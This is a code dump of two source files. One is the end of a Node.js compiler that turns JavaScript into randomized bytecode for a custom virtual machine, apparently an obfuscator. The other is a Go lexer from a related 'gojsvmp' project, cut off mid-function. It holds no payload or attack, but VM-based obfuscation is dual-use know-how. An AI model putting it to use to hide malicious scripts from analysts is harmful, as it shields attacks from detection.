// zhili.push(26)
zhili.pop()
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(1))
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z20))
zhili.push(RandDataCheise(zhilDx.z90))
startgetType(node.argument, variablePool, zhili)
}else if (node.operator =="--"){
zhili.pop()
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(1))
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z19))
zhili.push(RandDataCheise(zhilDx.z90))
startgetType(node.argument, variablePool, zhili)
}
break
case "LabeledStatement":
let vbvb = [];
let vbvbname = node.label.name;
startgetType(node.body, variablePool, vbvb)
for (var ff=0; ff<vbvb.length; ff++){
if (vbvb[ff] === vbvbname){
vbvb[ff] = RandDataCheise(zhilDx.z190);;
vbvb[ff+1] = vbvb.length - ff-2;
}
}
copyArrayList(zhili, vbvb)
break
case "BreakStatement":
if (node.label){
zhili.push(node.label.name)
zhili.push(undefined)
}else {
zhili.push("cbb_break_in_the_this_yhh_417")
zhili.push(undefined)
}
break
case "DebuggerStatement":
zhili.push(RandDataCheise(zhilDx.z194))
break
case "ForStatement":
startgetType(node.init, variablePool,zhili)
let lenko = zhili.length
startgetType(node.test, variablePool,zhili)
if (node.test == null)
{
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(true))
}
zhili.push(RandDataCheise(zhilDx.z25))
let fgfgfdsujj = []
startgetType(node.body, variablePool, fgfgfdsujj)
startgetType(node.update, variablePool, fgfgfdsujj)
fgfgfdsujj.push(RandDataCheise(zhilDx.z190))
fgfgfdsujj.push(lenko - zhili.length - fgfgfdsujj.length -2)
zhili.push(fgfgfdsujj.length)
lenko = fgfgfdsujj.length
for (let i =0; i< lenko; i++){
if (fgfgfdsujj[i] == "cbb_break_in_the_this_yhh_417"){
fgfgfdsujj[i] = RandDataCheise(zhilDx.z190);
fgfgfdsujj[i+1] = lenko - i - 2
}else if (fgfgfdsujj[i] == "cbb_continue_in_the_this_yhh_417"){
fgfgfdsujj[i] = RandDataCheise(zhilDx.z190);
fgfgfdsujj[i+1] = lenko - i - 4
}
}
copyArrayList(zhili, fgfgfdsujj)
break
case "WhileStatement":
let ffflenko = zhili.length
startgetType(node.test, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z25))
let jiiiujj = []
startgetType(node.body, variablePool, jiiiujj)
jiiiujj.push(RandDataCheise(zhilDx.z190))
jiiiujj.push(ffflenko - zhili.length - jiiiujj.length -2)
zhili.push(jiiiujj.length)
ffflenko = jiiiujj.length
for (let i =0; i< ffflenko; i++){
if (jiiiujj[i] == "cbb_break_in_the_this_yhh_417"){
jiiiujj[i] = RandDataCheise(zhilDx.z190);
jiiiujj[i+1] = ffflenko - i - 2
}else if (jiiiujj[i] == "cbb_continue_in_the_this_yhh_417"){
jiiiujj[i] = RandDataCheise(zhilDx.z190);
jiiiujj[i+1] = ffflenko - i - 4
}
}
copyArrayList(zhili, jiiiujj)
break
case "DoWhileStatement":
let lenko2 = zhili.length
let ujj = []
startgetType(node.body, variablePool,ujj)
// ujj.push(190)
// ujj.push(lenko - zhili.length -ujj.length-2)
lenkoe = ujj.length
for (let i =0; i< lenkoe; i++){
if (ujj[i] == "cbb_break_in_the_this_yhh_417"){
ujj[i] = RandDataCheise(zhilDx.z190);
ujj[i+1] = lenkoe - i - 2
}else if (ujj[i] == "cbb_continue_in_the_this_yhh_417"){
ujj[i] = RandDataCheise(zhilDx.z190);
ujj[i+1] = lenkoe - i - 4
}
}
copyArrayList(zhili, ujj)
startgetType(node.test, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z192))
zhili.push(lenko2-zhili.length-1)
break
case "ContinueStatement":
zhili.push("cbb_continue_in_the_this_yhh_417")
zhili.push(undefined)
break
case "VariableDeclarator":
variablePool[node.id.name] = null;
if (node.init != null){
startgetType(node.init, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z22))
a1 = constantPool.indexOf(node.id.name)
if (a1 == -1){
zhili.push(constantPool.length)
constantPool.push(node.id.name)
}else{
zhili.push(a1)
}
}
break
case "SwitchStatement":
startgetType(node.discriminant, variablePool,zhili)
let hu = node.cases.length
let zwdz = [];
let gggcbb = []
for (let i = 0;i < hu; i++){
let litshuz = []
if (node.cases[i].test == null){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( null))
}else{
startgetType(node.cases[i].test, variablePool, zhili)
}
zwdz.push(gggcbb.length)
// 块
for (let i2 = 0; i2 < node.cases[i].consequent.length; i2++){
startgetType(node.cases[i].consequent[i2], variablePool, litshuz)
}
copyArrayList(gggcbb, litshuz)
}
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( null))
for (let i = 0;i < zwdz.length; i++){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(zwdz[i]))
}
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(gggcbb.length))
zhili.push(RandDataCheise(zhilDx.z48))
zhili.push(hu+1)
let oolenko = gggcbb.length
for (let i =0; i< oolenko; i++){
if (gggcbb[i] == "cbb_break_in_the_this_yhh_417"){
gggcbb[i] = RandDataCheise(zhilDx.z190);
gggcbb[i+1] = oolenko - i -2
}
}
copyArrayList(zhili, gggcbb)
break
case "LogicalExpression":
if (node.operator == "&&"){
startgetType(node.left, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z51))
let bh = []
startgetType(node.right, variablePool, bh)
zhili.push(bh.length)
copyArrayList(zhili, bh)
}else if (node.operator == "||"){
startgetType(node.left, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z252))
let bh = []
startgetType(node.right, variablePool, bh)
zhili.push(bh.length)
copyArrayList(zhili, bh)
}
break
case "BooleanLiteral":
case "NumericLiteral":
case "NullLiteral":
case "StringLiteral":
zhili.push(RandDataCheise(zhilDx.z10))
a1 = constantPool.indexOf(node.value)
zhili.push(toPool(node.value))
break;
case "Identifier":
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.name))
zhili.push(RandDataCheise(zhilDx.z181))
break
case "MemberExpression":
startgetType(node.object, variablePool, zhili)
if (node.property.type == "Identifier" && node.computed == false){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.property.name))
zhili.push(RandDataCheise(zhilDx.z181))
}else if (node.property.type == "NumericLiteral" || node.property.type == "StringLiteral"){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.property.value))
zhili.push(RandDataCheise(zhilDx.z181))
}else{
startgetType(node.property, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z181))
}
break
case "BinaryExpression":
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx["z"+dat[node.operator]]))
break
case "UnaryExpression":
if (node.argument.type == "NumericLiteral" || node.argument.type == "BooleanLiteral" || node.argument.type == "StringLiteral"){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( node.argument.value))
}else{
startgetType(node.argument, variablePool, zhili)
}
if (node.operator == "~"){
zhili.push(RandDataCheise(zhilDx.z44))
}else if (node.operator == "typeof"){
zhili.push(RandDataCheise(zhilDx.z49))
}else if (node.operator == "!"){
zhili.push(RandDataCheise(zhilDx.z60))
}else if (node.operator == "-"){
zhili.push(RandDataCheise(zhilDx.z50))
}else if (node.operator == "delete"){
zhili.pop()
zhili.push(RandDataCheise(zhilDx.z55))
}else if (node.operator == "void"){
zhili.push(RandDataCheise(zhilDx.z56))
}
break
case "CallExpression":
for (let i = 0; i < node.arguments.length; i++){
startgetType(node.arguments[i], variablePool, zhili)
}
startgetType(node.callee, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z150))
zhili.push(node.arguments.length)
break
case "FunctionDeclaration":
variablePool[node.id.name] = "awcbb_yhh_fun"+numberKuai
startfun(node)
break
case "ArrowFunctionExpression":
case "FunctionExpression":
let bcxh
if (node.id){
bcxh = "awcbb_yhh_fun"+numberKuai
variablePool[node.id.name] = bcxh
startfun(node)
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.id.name))
zhili.push(RandDataCheise(zhilDx.z181))
}else {
bcxh = "awcbb_yhh_fun"+numberKuai
variablePool[bcxh] = bcxh
startfun(node)
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(bcxh))
zhili.push(RandDataCheise(zhilDx.z181))
}
break
case "SequenceExpression":
var d,ohh;
for (let i=0; i< node.expressions.length; i++){
startgetType(node.expressions[i], variablePool, zhili)
if (node.expressions[i].type === "CallExpression" || node.expressions[i].type === "Identifier" || node.expressions[i].type === "MemberExpression"
|| node.expressions[i].type === "BooleanLiteral"|| node.expressions[i].type === "NumericLiteral"
|| node.expressions[i].type === "NullLiteral"|| node.expressions[i].type === "StringLiteral"
|| node.expressions[i].type === "FunctionExpression"
|| node.expressions[i].type === "UnaryExpression"
|| node.expressions[i].type === "BinaryExpression"
|| node.expressions[i].type === "SequenceExpression"
|| node.expressions[i].type === "UpdateExpression"
|| node.expressions[i].type === "AssignmentExpression"
|| node.expressions[i].type === "LogicalExpression"
|| node.expressions[i].type === "ConditionalExpression"
|| true
){
d = zhili.push(RandDataCheise(zhilDx.z1810))
ohh = 1
}else {
ohh =0
}
}
if (ohh === 1){
zhili.pop()
}else {
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(undefined))
}
break
case "ObjectExpression":
zhili.push(RandDataCheise(zhilDx.z104))
for (let i=0; i< node.properties.length; i++){
startgetType(node.properties[i], variablePool, zhili)
}
break
case "ThrowStatement":
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z58))
break
case "ObjectProperty":
if (node.key.type == "Identifier"){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.key.name))
}else{
startgetType(node.key, variablePool,zhili)
}
startgetType(node.value, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z45))
break
case "ArrayExpression":
zhili.push(RandDataCheise(zhilDx.z105))
for (let i=0; i< node.elements.length; i++){
startgetType(node.elements[i], variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z40))
}
break;
case "RegExpLiteral":
zhili.push(RandDataCheise(zhilDx.z8))
zhili.push(toPool( node.pattern))
zhili.push(toPool( node.flags))
break
case "TryStatement":
zhili.push(RandDataCheise(zhilDx.z195))
let bcnxbc = []
startgetType(node.block, variablePool, bcnxbc)
bcnxbc.push(RandDataCheise(zhilDx.z200))
zhili.push(bcnxbc.length)
if (node.handler != null){
variablePool[node.handler.param.name] = null
startgetType(node.handler.param, variablePool, bcnxbc)
bcnxbc.pop()
bcnxbc.push(RandDataCheise(zhilDx.z197))
startgetType(node.handler.body, variablePool, bcnxbc)
}
bcnxbc.push(RandDataCheise(zhilDx.z200))
zhili.push(bcnxbc.length - zhili[zhili.length-1])
if (node.finalizer != null){
startgetType(node.finalizer, variablePool, bcnxbc)
}
bcnxbc.push(RandDataCheise(zhilDx.z200))
zhili.push(bcnxbc.length - zhili[zhili.length-1]- zhili[zhili.length-2])
copyArrayList(zhili, bcnxbc)
break
case "AssignmentPattern":
case "AssignmentExpression":
if (node.operator == '+='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z20))
zhili.push(RandDataCheise(zhilDx.z90))
}else if (node.operator == '-='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z291))
zhili.push(RandDataCheise(zhilDx.z90))
}else if (node.operator == '|='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z32))
zhili.push(RandDataCheise(zhilDx.z90))
}else if(datkey.indexOf(node.operator) != -1){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx["z"+dat[node.operator.replace("=","")]]))
zhili.push(RandDataCheise(zhilDx.z90))
}else{
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z290))
}
// startgetType(node.left, variablePool, zhili)
break;
case "ExpressionStatement":
startgetType(node.expression, variablePool, zhili)
break
case "BlockStatement":
for (a1= 0; a1< node.body.length; a1++){
startgetType(node.body[a1], variablePool, zhili)
}
break
case "ThisExpression":
zhili.push(RandDataCheise(zhilDx.z47))
break
case "NewExpression":
let callargsNum = node.arguments.length;
for (let i =0; i< node.arguments.length; i++){
startgetType(node.arguments[i], variablePool, zhili)
}
startgetType(node.callee, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z46))
zhili.push(callargsNum)
break
case "ReturnStatement":
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z200))
break
default:
console.log(generator(node).code)
console.log("is not jiex");
}
}
function startfun(node2){
let name = "awcbb_yhh_fun"+numberKuai
numberKuai += 1
changlc[name] = {"variablePool":{}
, "zhili": []}
for (let i =0; i< node2.params.length; i++){
if (node2.params[i].type === "AssignmentPattern"){
changlc[name]['variablePool'][node2.params[i].left.name] = null
startgetType(node2.params[i], changlc[name]['variablePool'], changlc[name]['zhili'])
changlc[name]['zhili'].push(RandDataCheise(zhilDx.z10))
changlc[name]['zhili'].push(toPool(node2.params[i].left.name))
}else{
changlc[name]['variablePool'][node2.params[i].name] = null
changlc[name]['zhili'].push(RandDataCheise(zhilDx.z10))
changlc[name]['zhili'].push(toPool(node2.params[i].name))
}
}
changlc[name]['zhili'].push(RandDataCheise(zhilDx.z2))
startgetType(node2.body, changlc[name]['variablePool'], changlc[name]['zhili'])
let hb = []
for (let i in changlc[name]['variablePool']){
if (changlc[name]['variablePool'][i] && changlc[name]['variablePool'][i].indexOf("awcbb_yhh_fun") != -1){
hb.push(RandDataCheise(zhilDx.z10))
hb.push(toPool(i))
}
}
hb.push(RandDataCheise(zhilDx.z1))
let f = hb.length
for (let i =0;i< f; i++){
changlc[name]['zhili'].splice(0,0,hb.pop())
}
}
function start(node2){
let name = "awcbb_yhh_fun"+numberKuai
numberKuai += 1
changlc[name] = {"variablePool":{}
, "zhili": []}
let node = node2.program.body
for (let i = 0; i < node.length; i++){
startgetType(node[i], changlc[name]['variablePool'], changlc[name]['zhili'])
}
let hb = []
for (let i in changlc[name]['variablePool']){
if (changlc[name]['variablePool'][i] && changlc[name]['variablePool'][i].indexOf("awcbb_yhh_fun") != -1){
hb.push(RandDataCheise(zhilDx.z10))
hb.push(toPool(i))
}
}
hb.push(RandDataCheise(zhilDx.z1))
let f = hb.length
for (let i =0;i< f; i++){
changlc[name]['zhili'].splice(0,0,hb.pop())
}
}
start(ast)
var datatext = "var constantPool = "+ JSON.stringify(constantPool)+"; var changlc = "+ JSON.stringify(changlc)+";\n"+dataText2;
var d = parser.parse(datatext)
d = generator(d,{
compact:true
}).code
fs.writeFileSync(outpath, d, (e)=>{})
}
const tst = + new Date()
// 需要加密的js
const soure = "t3.js"
const outpath = "./outsrc/out.js"
cbbjsvmp(soure,outpath)
console.log("user time =>", +new Date() - tst)
// 转es6的插件有问题 readme有方法可转
// if (offes5 ===1){
// process.exec(`traceur --script ./src/${soure} --out ./dist/${soure}`, (error, stdout, stderr) => {
// if (!error) {
// console.log("es6 to es5 ==> 成功");
// cbbjsvmp()
// console.log("file is save ==> ./outsrc/out.js");
// console.log("user time =>", +new Date() - tst)
// } else {
// console.log("es6 to es5 ==> 失败");
// }
// });
// } else {
// cbbjsvmp()
// console.log("file is save ==> ./outsrc/out.js");
// console.log("user time =>", +new Date() - tst)
// }
|
2833844911/gojsvmp | 15,348 | lexer/lexer.go | package lexer
import (
"myvmp/token"
"regexp"
)
type LexerParse struct {
keyList []string
value string
start int
maxlength int
}
type CardList struct {
value []*token.TokenType
}
func New(dt string) *LexerParse {
//dt = strings.Replace(dt, "\n", token.Kong, -1)
//dt = strings.Replace(dt, "\n", token.OVER, -1)
//dt = strings.Replace(dt, "\t", token.Kong, -1)
//dt = strings.Replace(dt, "\r", token.Kong, -1)
re := regexp.MustCompile(`[;]+\s*[;]+`)
dt = re.ReplaceAllString(dt, ";")
ree := regexp.MustCompile(`[{]+\s*[;]+`)
dt = ree.ReplaceAllString(dt, "{")
return &LexerParse{value: dt, start: -1, maxlength: len(dt)}
}
func (lp *LexerParse) clearNop() {
for {
lp.start++
if lp.start >= lp.maxlength {
return
}
chardt := lp.value[lp.start : lp.start+1]
if chardt != token.NOP {
lp.start--
return
}
}
}
func (lp *LexerParse) clearZhus() {
for {
lp.start++
if lp.start >= lp.maxlength {
return
}
chardt := lp.value[lp.start : lp.start+1]
if chardt == token.OVER || chardt == token.HUANH {
lp.start--
return
}
}
}
func (lp *LexerParse) readCard() string {
carddt := token.Kong
for {
lp.start++
if lp.start >= lp.maxlength {
//fmt.Println("结束")
return token.NNNN
}
chardt := lp.value[lp.start : lp.start+1]
if chardt == token.NOP || chardt == token.TB || chardt == token.TR || chardt == token.YIHUO || chardt == token.HUANH || chardt == token.DUOZF || chardt == token.Dian || chardt == token.QUYU || chardt == token.Str || chardt == token.Str2 || chardt == token.QUFAN || chardt == token.MAOHAO || chardt == token.YU || chardt == token.HUO || chardt == token.DENYU || chardt == token.XIAOYH || chardt == token.DAYH || chardt == token.ZUOZ || chardt == token.YOUZ || chardt == token.ZUOKH || chardt == token.YOUKH || chardt == token.ZHUOK || chardt == token.YOUOK || chardt == token.OVER || chardt == token.ADD || chardt == token.SDD || chardt == token.DH || chardt == token.CHEN || chardt == token.CHU {
if chardt == token.NOP {
lp.clearNop()
if carddt == token.NNNN {
continue
}
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.CHU+token.CHU {
lp.clearZhus()
continue
}
if carddt != token.NNNN {
if chardt != token.NOP {
lp.start--
}
} else {
if lp.start+3 < lp.maxlength && lp.value[lp.start:lp.start+3] == token.DXIAND {
lp.start = lp.start + 2
return lp.value[lp.start-2 : lp.start+1]
}
if lp.start+3 < lp.maxlength && lp.value[lp.start:lp.start+3] == token.DAYHYHYU {
lp.start = lp.start + 2
return lp.value[lp.start-2 : lp.start+1]
}
if lp.start+3 < lp.maxlength && lp.value[lp.start:lp.start+3] == token.XIAOYHYHYH {
lp.start = lp.start + 2
return lp.value[lp.start-2 : lp.start+1]
}
if lp.start+3 < lp.maxlength && lp.value[lp.start:lp.start+3] == token.BUDYDY {
lp.start = lp.start + 2
return lp.value[lp.start-2 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.XIAND {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.KAIFAN {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.XIAOYHDY {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.DAYHDY {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.BUDY {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.DAYHYH {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.UPADD {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.UPASD {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.JIADEN {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.JANDEN {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.XIAOYHYH {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.HUOHUO {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.YUYU {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
carddt = chardt
}
if chardt == token.Dian && isDigit(lp.value[lp.start+2]) {
lp.start++
} else {
return carddt
}
}
carddt += chardt
}
}
func isDigit(ch byte) bool {
return '0' <= ch && ch <= '9'
}
func (lp *LexerParse) readStr() string {
carddt := ""
qian := ""
for {
lp.start++
cff := lp.value[lp.start : lp.start+1]
if qian == "\\" && cff == "n" {
cff = "\n"
} else if qian == "\\" && cff == "t" {
cff = "\t"
} else if qian == "\\" && cff == "\"" {
qian = cff
carddt += "\""
continue
} else if qian == "\\" && cff == "\\" {
qian = "\\\\"
cff = "\\"
carddt += cff
continue
}
qian = cff
if cff == token.Str {
break
}
if qian == "\\" {
continue
}
carddt += cff
}
return carddt
}
func (lp *LexerParse) readStr3() string {
carddt := ""
qian := ""
for {
lp.start++
cff := lp.value[lp.start : lp.start+1]
if qian == "\\" && cff == "n" {
cff = "\n"
} else if qian == "\\" && cff == "t" {
cff = "\t"
} else if qian == "\\" && cff == "\"" {
qian = cff
carddt += "\""
continue
} else if qian == "\\" && cff == "\\" {
qian = "\\\\"
cff = "\\"
carddt += cff
continue
}
qian = cff
if cff == token.DUOZF {
break
}
if qian == "\\" {
continue
}
carddt += cff
}
return carddt
}
func (lp *LexerParse) readStr2() string {
carddt := token.Kong
qian := ""
for {
lp.start++
cff := lp.value[lp.start : lp.start+1]
if qian == "\\" && cff == "n" {
cff = "\n"
} else if qian == "\\" && cff == "t" {
cff = "\t"
} else if qian == "\\" && cff == "'" {
qian = cff
carddt += "\""
continue
} else if qian == "\\" && cff == "\\" {
qian = "\\\\"
cff = "\\"
carddt += cff
continue
}
qian = cff
if cff == token.Str2 {
break
}
if qian == "\\" {
continue
}
carddt += cff
}
return carddt
}
func (lp *LexerParse) nextCard() *token.TokenType {
for {
if lp.start >= lp.maxlength {
//fmt.Println("结束")
return &token.TokenType{
TypeInfo: token.DONT,
}
}
card := lp.readCard()
switch card {
case token.VAR:
return &token.TokenType{
TypeInfo: token.VAR,
Value: card,
PAXU: token.ONE,
}
case token.UPADD:
return &token.TokenType{
TypeInfo: token.UPADD,
Value: card,
PAXU: token.ONE,
}
case token.UPASD:
return &token.TokenType{
TypeInfo: token.UPASD,
Value: card,
PAXU: token.ONE,
}
case token.IN:
return &token.TokenType{
TypeInfo: token.IN,
Value: card,
PAXU: token.ONE,
}
case token.DAYHDY:
return &token.TokenType{
TypeInfo: token.DAYHDY,
Value: card,
PAXU: token.ZNO,
}
case token.XIAOYHDY:
return &token.TokenType{
TypeInfo: token.XIAOYHDY,
Value: card,
PAXU: token.ZNO,
}
case token.MAOHAO:
return &token.TokenType{
TypeInfo: token.MAOHAO,
Value: card,
PAXU: token.ZNO,
}
case token.DAYHYH:
return &token.TokenType{
TypeInfo: token.DAYHYH,
Value: card,
PAXU: token.ZNO,
}
case token.DAYHYHYU:
return &token.TokenType{
TypeInfo: token.DAYHYHYU,
Value: card,
PAXU: token.ZNO,
}
case token.XIAOYHYH:
return &token.TokenType{
TypeInfo: token.XIAOYHYH,
Value: card,
PAXU: token.ZNO,
}
case token.HUOHUO:
return &token.TokenType{
TypeInfo: token.HUOHUO,
Value: card,
PAXU: token.ONE,
}
case token.YUYU:
return &token.TokenType{
TypeInfo: token.YUYU,
Value: card,
PAXU: token.ONE,
}
case token.HUO:
return &token.TokenType{
TypeInfo: token.HUO,
Value: card,
PAXU: token.ZNO,
}
case token.YU:
return &token.TokenType{
TypeInfo: token.YU,
Value: card,
PAXU: token.ZNO,
}
case token.XIAOYHYHYH:
return &token.TokenType{
TypeInfo: token.XIAOYHYHYH,
Value: card,
PAXU: token.ZNO,
}
case token.DENYU:
return &token.TokenType{
TypeInfo: token.DENYU,
Value: card,
PAXU: token.ONE,
}
case token.JIADEN:
return &token.TokenType{
TypeInfo: token.JIADEN,
Value: card,
PAXU: token.ONE,
}
case token.JANDEN:
return &token.TokenType{
TypeInfo: token.JANDEN,
Value: card,
PAXU: token.ONE,
}
case token.SDD:
return &token.TokenType{
TypeInfo: token.SDD,
Value: card,
PAXU: token.TWO,
}
case token.IF:
return &token.TokenType{
TypeInfo: token.IF,
Value: card,
PAXU: token.ONE,
}
case token.NULL:
return &token.TokenType{
TypeInfo: token.NULL,
Value: card,
PAXU: token.ONE,
}
case token.CHU:
return &token.TokenType{
TypeInfo: token.CHU,
Value: card,
PAXU: token.SCRRR,
}
case token.YIHUO:
return &token.TokenType{
TypeInfo: token.YIHUO,
Value: card,
PAXU: token.SCRRR,
}
case token.TYPEOF:
return &token.TokenType{
TypeInfo: token.TYPEOF,
Value: card,
PAXU: token.SCRRR,
}
case token.OVER:
return &token.TokenType{
TypeInfo: token.OVER,
Value: card,
PAXU: token.ONE,
}
case token.HUANH:
return &token.TokenType{
TypeInfo: token.OVER,
Value: card,
PAXU: token.ONE,
}
case token.Str:
ddd := lp.readStr()
return &token.TokenType{
TypeInfo: token.Str,
Value: ddd,
PAXU: token.FOTT,
}
case token.TB:
continue
case token.TR:
continue
case token.Str2:
ddd := lp.readStr2()
return &token.TokenType{
TypeInfo: token.Str,
Value: ddd,
PAXU: token.FOTT,
}
case token.DUOZF:
ddd := lp.readStr3()
return &token.TokenType{
TypeInfo: token.Str,
Value: ddd,
PAXU: token.FOTT,
}
case token.ADD:
return &token.TokenType{
TypeInfo: token.ADD,
Value: card,
PAXU: token.TWO,
}
case token.TRY:
return &token.TokenType{
TypeInfo: token.TRY,
Value: card,
PAXU: token.TWO,
}
case token.CATCH:
return &token.TokenType{
TypeInfo: token.CATCH,
Value: card,
PAXU: token.TWO,
}
case token.FOR:
return &token.TokenType{
TypeInfo: token.FOR,
Value: card,
PAXU: token.ONE,
}
case token.XIAOYH:
return &token.TokenType{
TypeInfo: token.XIAOYH,
Value: card,
PAXU: token.ZNO,
}
case token.Debug:
return &token.TokenType{
TypeInfo: token.Debug,
Value: card,
PAXU: token.ZNO,
}
case token.DAYH:
return &token.TokenType{
TypeInfo: token.DAYH,
Value: card,
PAXU: token.ZNO,
}
case token.BREAK:
return &token.TokenType{
TypeInfo: token.BREAK,
Value: card,
PAXU: token.ONE,
}
case token.CONTINUE:
return &token.TokenType{
TypeInfo: token.CONTINUE,
Value: card,
PAXU: token.ONE,
}
case token.THIS:
return &token.TokenType{
TypeInfo: token.THIS,
Value: card,
PAXU: token.ONE,
}
case token.DH:
return &token.TokenType{
TypeInfo: token.DH,
Value: card,
PAXU: token.ONE,
}
case token.FUN:
return &token.TokenType{
TypeInfo: token.FUN,
Value: card,
PAXU: token.ONE,
}
case token.ELSE:
return &token.TokenType{
TypeInfo: token.ELSE,
Value: card,
PAXU: token.ONE,
}
case token.YOUOK:
return &token.TokenType{
TypeInfo: token.YOUOK,
Value: card,
PAXU: token.ONE,
}
case token.YOUKH:
return &token.TokenType{
TypeInfo: token.YOUKH,
Value: card,
PAXU: token.ONE,
}
case token.ZUOKH:
return &token.TokenType{
TypeInfo: token.ZUOKH,
Value: card,
PAXU: token.ONE,
}
case token.ZHUOK:
return &token.TokenType{
TypeInfo: token.ZHUOK,
Value: card,
PAXU: token.ONE,
}
case token.KAIFAN:
return &token.TokenType{
TypeInfo: token.KAIFAN,
Value: card,
PAXU: token.SCRRR,
}
case token.XIAND:
return &token.TokenType{
TypeInfo: token.XIAND,
Value: card,
PAXU: token.ZNO,
}
case token.BUDY:
return &token.TokenType{
TypeInfo: token.BUDY,
Value: card,
PAXU: token.ZNO,
}
case token.BUDYDY:
return &token.TokenType{
TypeInfo: token.BUDYDY,
Value: card,
PAXU: token.ZNO,
}
case token.QUFAN:
return &token.TokenType{
TypeInfo: token.QUFAN,
Value: card,
PAXU: token.SIX,
}
case token.DXIAND:
return &token.TokenType{
TypeInfo: token.DXIAND,
Value: card,
PAXU: token.ZNO,
}
case token.CHEN:
return &token.TokenType{
TypeInfo: token.CHEN,
Value: card,
PAXU: token.SCRRR,
}
case token.QUYU:
return &token.TokenType{
TypeInfo: token.QUYU,
Value: card,
PAXU: token.SCRRR,
}
case token.END:
return &token.TokenType{
TypeInfo: token.END,
Value: card,
PAXU: token.ONE,
}
case token.NEW:
return &token.TokenType{
TypeInfo: token.NEW,
Value: card,
PAXU: token.ONE,
}
case token.RETURN:
return &token.TokenType{
TypeInfo: token.RETURN,
Value: card,
PAXU: token.ONE,
}
case token.YOUZ:
return &token.TokenType{
TypeInfo: token.YOUZ,
Value: card,
PAXU: token.SCRRR,
}
case token.ZUOZ:
return &token.TokenType{
TypeInfo: token.ZUOZ,
Value: card,
PAXU: token.ONE,
}
case token.Dian:
return &token.TokenType{
TypeInfo: token.Dian,
Value: card,
PAXU: token.ONE,
}
default:
if isDigit(card[0]) {
return &token.TokenType{
TypeInfo: token.INT,
Value: card,
